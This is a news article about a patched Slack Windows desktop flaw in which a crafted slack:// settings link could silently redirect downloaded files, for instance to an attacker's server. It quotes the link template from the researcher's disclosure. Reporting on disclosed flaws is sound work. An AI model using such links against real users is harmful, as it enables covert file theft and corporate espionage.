Tech News
Slack patches Windows app bug that couldve been used for spying
https://mashable.com/article/slack-patches-windows-bug-spying/
for
2019-05-17 20:54:44 UTC
Follow @https://twitter.com/PCMag
PCMag.com is a leading authority on technology, delivering Labs-based, independent reviews of the latest products and services. Our expert industry analysis and practical solutions help you make better buying decisions and get more from technology.
A security researcher has uncovered a flaw in Slack that could’ve been exploited to steal files over the business messaging app and potentially spread malware.
The flaw involves Slack’s Windows desktop app, and how it can automatically send downloaded files to a certain destination—whether it be on your PC or to an online storage server. You can set a download location in the app’s preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there’s another way to configure the option: Via a special link.
“Crafting a link like ‘slack://settings/?update={‘PrefSSBFileDownloadPath’:<pathHere>’}’ would change the default download location if clicked,” Wells wrote in a blog post on the vulnerability.
Real Life. Real News. Real Voices
Help us tell more of the stories that matter
Become a founding memberWells realized the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. “Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview,” Well’s security firm Tenable said in a separate report.